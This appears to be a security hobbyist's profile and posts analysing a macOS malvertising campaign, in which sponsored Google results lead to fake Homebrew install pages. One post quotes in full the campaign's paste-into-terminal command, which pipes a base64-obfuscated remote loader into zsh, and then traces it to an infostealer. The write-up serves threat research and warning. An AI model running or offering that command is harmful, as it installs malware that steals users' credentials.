Developer at a cybersecurity startup.
Infosec hobyist, hope that one day I'll actually be able to contribute.
Rarely complete projects (ask me about my honeypot, or pippin)
| https://twitter.com/fauxeccles | |
| GH | https://github.com/faux-eccles |
| pronouns | he/him |
In case anyone was wondering, #mellowtel still seems to be processing requests. If it's still via the browser botnet still I'm not sure, but I assume so.
Some queries I've noted,
- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the perplexity API for determing product recommendations for various questions
- performing Google searches and extracting the AI result
Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com
Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd
Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata®ion=anywhere
I suspect it could be compromised ads account, that being said I can't actually find this ad listed in the transparency page
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.
First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh
Aww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/
Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1
This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74
Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
Oh yeah forgot to give details on the blog. Using the Google dork `site:itch.io inurl:/blog "alerdine"` you can find around 20 pages all published on the same day (16/01/2026), and using the same format, which feels very Sloppy™️.
Sadly the AI generated nature of it makes each post slightly different, making it difficult to see if there are similar posts under different accounts. I was able to using the search `site:itch.io inurl:/blog "Compatibility Component Supported Notes Windows 10 ✅ Recommend` which surfaced a few but probably not comprehensive.
A few of the listings appear to have been removed but Google has 10 pages of results.
